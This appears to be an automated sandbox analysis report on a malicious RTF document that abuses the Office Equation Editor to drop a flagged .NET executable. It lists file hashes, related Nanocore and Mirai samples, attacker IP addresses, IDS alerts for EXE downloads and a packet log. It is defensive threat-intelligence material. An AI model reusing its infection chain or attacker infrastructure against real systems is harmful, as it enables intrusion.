                                                                                                                                  RFQ_PO_091232.docGet hashmaliciousNanocoreBrowse
                                                                                                                                  • 87.120.84.38
                                                                                                                                  LkUJU0rsxdoNTRjxlZ5e0rZRO3rOY4rKRo.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 87.120.84.230
                                                                                                                                  wsaySOikSR3afBEBBbLelehAkQc8MFUcQx.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 87.120.84.230
                                                                                                                                  m1TuocfCMhon01ZDYjxrTEWsmYdVD8FZ4k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                  • 87.120.84.230
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                  No context
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):64
                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Preview:@...e...........................................................
                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):837120
                                                                                                                                  Entropy (8bit):7.96907229026701
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:zb3VKo7/7uh5twavgmhh4rdOxHOizP3Api7EO2jLW1mmxj0A57l3j4iRlKKAg:zbco7jo5p4CKdOx93HeLGaE7xj40l2
                                                                                                                                  MD5:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  SHA1:80E09457252563A7EC99095364FD1A9FB3D3F27D
                                                                                                                                  SHA-256:A460050185C6DF524792697A1B751A2FB309939E5A34D135459D4A6DBBD66EE0
                                                                                                                                  SHA-512:887FA68F650484950EDFF6C562F24491B286F10806A0AAEB9163076866D878E6B0D54F2B1B2FBC8EFFF98F65451EEEAAA4914C7F86B57FBBD7775BDD571F2728
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                  Reputation:low
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):16384
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3::
                                                                                                                                  MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                                                                  SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                                                                  SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                                                                  SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1536
                                                                                                                                  Entropy (8bit):1.357318797251612
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbj:IiiiiiiiiifdLloZQc8++lsJe1Mzml/
                                                                                                                                  MD5:575B3C3FA4B9E4CF996B44132727539D
                                                                                                                                  SHA1:99FF76D9C349FA4FB08864BAA1A711FBFED271BD
                                                                                                                                  SHA-256:EE06644488C49AD3F85A566034D8518D2D301C11EC5A31E93398518785B2CF96
                                                                                                                                  SHA-512:E06DF79FE8A2B1348FD44DFF1680404BB9A8F2D33C221A710780D32867D590371D131D6B70BA4AA2BEC4A41149B598F5723FB5B69437F0E26C3CABC0B6F5C4F4
                                                                                                                                  Malicious:false
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1024
                                                                                                                                  Entropy (8bit):0.05390218305374581
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                  Malicious:false
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):153088
                                                                                                                                  Entropy (8bit):3.5592781508910143
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:UyemryemryemryemryemryemryemryemJwCId:Uyemryemryemryemryemryemryemryel
                                                                                                                                  MD5:5A9B00CE4762463AB4D9B4E3C346D228
                                                                                                                                  SHA1:2C72A7863C9817CA36C1337B69A84C347E59EFD2
                                                                                                                                  SHA-256:3F6298C8BB930EA27A04EB00BA0BF0345784BCEFE3444BBC38AF9FAF7D6E05D6
                                                                                                                                  SHA-512:C8EFE61E9BB77240549F3D837E0B435D87E48AAA7276564F973BC5629F611BD0AF85229A9C99B62C0719ED9C570D51A636535C96523048544D886C07A6F278B5
                                                                                                                                  Malicious:false
Preview:38502664please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated in accordance with the basis of accounting used by your organization. So why are the auditors giving you that other letter In an audit of financial statements, professional standards require that auditors obtain an understanding of internal controls to the extent necessary to plan the audit. Auditors use this understanding of internal controls to assess
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1
                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1
                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:1
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:08 2023, mtime=Fri Aug 11 15:42:08 2023, atime=Tue Nov 19 16:07:58 2024, length=418646, window=hide
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):1059
                                                                                                                                  Entropy (8bit):4.561963422105871
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:8ajgXg/XAlCPCHaX1BAB/5YXX+WCpUI0d4juicvbIXodeDtZ3YilMMEpxRljKhcM:8U/XTli4XwpkdcNe/deDv3qsw57u
                                                                                                                                  MD5:FA323A2C9506413D48D5BA48D712191E
                                                                                                                                  SHA1:7D986C979CCAE5C215193F9B2B68BA8B134F7C4C
                                                                                                                                  SHA-256:29F64B7799B41F61E45994EE482000547AD196C81E3D20B5FA2671CEA8061B1A
                                                                                                                                  SHA-512:F591232C4D8CBB39BCDB0DAFFE8D2F82E2CF5BD8AB944E2F81B81EAD4AD834FDDDAAF2F6B00577EFF1B05965FB04F4C607325CA4F17579E3F0D8D58722EF1485
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:L..................F.... .......r.......r.....w..:..Vc...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....sY....user.8......QK.XsY..*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.Vc..sY.. .XKL0PN~1.RTF..\.......WE..WE.*.........................X.k.l.0.P.n.D.8.z.F.P.j.f.h.1...w.i.z...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\878411\Users.user\Desktop\Xkl0PnD8zFPjfh1.wiz.rtf.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.X.k.l.0.P.n.D.8.z.F.P.j.f.h.1...w.i.z...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......878411..........D_....3N.
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:Generic INItialization configuration [folders]
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):73
                                                                                                                                  Entropy (8bit):4.871130551941791
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:H2A3MfAlm4UX3MfAlv:HxMfHnMfC
                                                                                                                                  MD5:CB82D4C74D6BFF434AE5C3DE702AB9F1
                                                                                                                                  SHA1:84FED21BFD3ADD622F14E3B3EADA79504BF2215C
                                                                                                                                  SHA-256:3BD22815A22411F89BA452910204E484BEFA880CF20AF9149559D627AF2E6686
                                                                                                                                  SHA-512:23BAB0C1980BD5FF63E847FFD0418E7949E05211CA461925223ADF0CF40CD0063BB44415451FA755BE58EA3C321464144D138CCA29230BB8AFE17D602C50977A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:[misc]..Xkl0PnD8zFPjfh1.wiz.LNK=0..[folders]..Xkl0PnD8zFPjfh1.wiz.LNK=0..
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):162
                                                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vrJlaCkWtVyoLKbi/YnlmW+yeTAGllln:vdsCkWtr+bignb+l
                                                                                                                                  MD5:1A57991C3E13EFE0AF71147826265A23
                                                                                                                                  SHA1:32136211C8F1835CCFA0A9C23ECCE47710621C65
                                                                                                                                  SHA-256:7B63ACAE133205BE9F89C8B18103DACE4547BCCEF1262666F6D18D5F6C540ED7
                                                                                                                                  SHA-512:7D2C7CCC1CDF80845EB9D45366E2556367E9D5F44CD3FA675845CC16857FE5058F85E4F252B0A058EAF3D54652816683BB65B1BFAB5AF53E8B63994CF86EBCF3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):2
                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..
                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):837120
                                                                                                                                  Entropy (8bit):7.96907229026701
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:zb3VKo7/7uh5twavgmhh4rdOxHOizP3Api7EO2jLW1mmxj0A57l3j4iRlKKAg:zbco7jo5p4CKdOx93HeLGaE7xj40l2
                                                                                                                                  MD5:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  SHA1:80E09457252563A7EC99095364FD1A9FB3D3F27D
                                                                                                                                  SHA-256:A460050185C6DF524792697A1B751A2FB309939E5A34D135459D4A6DBBD66EE0
                                                                                                                                  SHA-512:887FA68F650484950EDFF6C562F24491B286F10806A0AAEB9163076866D878E6B0D54F2B1B2FBC8EFFF98F65451EEEAAA4914C7F86B57FBBD7775BDD571F2728
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<g..............0......"........... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B.......................H.......h^...6......D........*...........................................0..]..........7...%.r...p.%...%.r...p.%...%.r...p.(....(......s.............o......o.........,..o......*.........2..Q.......0..a..........7...%.r...p.%...%.r...p.%...%.r...p.(....(......s.......o...........o.........,..o........+..*.........2..P.......0..B........r...p.rA..p(....(......s.............o .....o.........,..o......*...........6.......0..F........r...p.rA..p(....(......s.......o!..........o...
                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):162
                                                                                                                                  Entropy (8bit):2.5038355507075254
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3:vrJlaCkWtVyoLKbi/YnlmW+yeTAGllln:vdsCkWtr+bignb+l
                                                                                                                                  MD5:1A57991C3E13EFE0AF71147826265A23
                                                                                                                                  SHA1:32136211C8F1835CCFA0A9C23ECCE47710621C65
                                                                                                                                  SHA-256:7B63ACAE133205BE9F89C8B18103DACE4547BCCEF1262666F6D18D5F6C540ED7
                                                                                                                                  SHA-512:7D2C7CCC1CDF80845EB9D45366E2556367E9D5F44CD3FA675845CC16857FE5058F85E4F252B0A058EAF3D54652816683BB65B1BFAB5AF53E8B63994CF86EBCF3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                                                                  File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (65322), with CR line terminators
                                                                                                                                  Entropy (8bit):3.238178515541963
                                                                                                                                  TrID:
                                                                                                                                  • Rich Text Format (4004/1) 100.00%
                                                                                                                                  File name:Xkl0PnD8zFPjfh1.wiz.rtf
                                                                                                                                  File size:418'646 bytes
                                                                                                                                  MD5:f6e89e6c3ab17d8d58699ccefeaf3c8d
                                                                                                                                  SHA1:86c245d0a2ef138aa7afca6bb43316e251b07c68
                                                                                                                                  SHA256:32f5bf26d32b42212ada3e88017ad037c6c84f760a64585252576d893a00ff5f
                                                                                                                                  SHA512:ab3a82dcd600c7169da373101593480a1ef8e82b2d339b5367f0e2b118f23ec3eb591a3e269de3f5d8b0e0843ec4574b33c5f98e0344c4be38a26c25caccb4b6
                                                                                                                                  SSDEEP:3072:wwAlawAlawAlawAlawAlawAlawAlawAltU8xX2iqwq3QS:wwAYwAYwAYwAYwAYwAYwAYwA3dTqAS
                                                                                                                                  TLSH:E0948A6DD34B02598F620377AB571E5142BDBA7EF38552B1302C533933EAC39A1252BE
                                                                                                                                  File Content Preview:{\rt..{\*\qKCjBQmehMq8XCWngYGOhKf8jfgJl6x3C5RTWeOwPMPiwXrh8fXchBYG6KO5iQT4UIbjZyyYRfKT4wFiWBtxhKnWIj77AVvUkqwfsmK8oAtYSoTUu0YWCABaMo6Ydm700elPyVDLZmN8dZJfI2rUl6W6KReYfcnGIdL8NWRpkP4L8bXujB20tZZiDX3HmSlvdgy0cGlFM}..{\938502664please click Enable editing fr
                                                                                                                                  Icon Hash:2764a3aaaeb7bdbf
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T18:08:04.164643+0100 | 2022050 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 | 1 | 87.120.84.39 | 80 | 192.168.2.22 | 49161 | TCP
2024-11-19T18:08:04.342515+0100 | 2022051 | ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 | 1 | 87.120.84.39 | 80 | 192.168.2.22 | 49161 | TCP
2024-11-19T18:08:11.081951+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49162 | 193.122.130.0 | 80 | TCP
2024-11-19T18:08:12.338005+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49162 | 193.122.130.0 | 80 | TCP
2024-11-19T18:08:12.766539+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49164 | 188.114.97.3 | 443 | TCP
2024-11-19T18:08:14.160503+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.22 | 49165 | 193.122.130.0 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                  Nov 19, 2024 18:08:04.299365044 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299376965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299386978 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299432993 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.299432993 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.299448013 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299460888 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.299555063 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304157019 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304168940 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304177999 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304194927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304207087 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304219007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.304234982 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304234982 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304234982 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304284096 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.304284096 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.308929920 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308943033 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308953047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308964968 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.308974028 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.309196949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.313651085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.313663960 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.313673973 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.313749075 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.313749075 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.342514992 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.342674017 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.429878950 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430047035 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430051088 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430057049 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430069923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430079937 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430088997 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430105925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430105925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430105925 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430120945 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430478096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430488110 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430497885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430531025 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430531025 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430809021 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430864096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430871964 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.430885077 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430901051 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.430912971 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432671070 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432682991 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432692051 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432727098 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432727098 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432823896 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432864904 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.432907104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432918072 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432928085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432938099 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.432955027 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433048964 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433545113 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433577061 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433588982 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433593988 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433676958 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433686972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433697939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.433720112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433720112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433720112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.433748960 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434444904 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434456110 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434465885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434510946 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434521914 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434531927 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434559107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.434637070 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435336113 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435347080 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435358047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435410976 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435421944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435431957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.435453892 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436264038 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436275959 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436286926 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.436317921 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.436317921 CET4916180192.168.2.2287.120.84.39
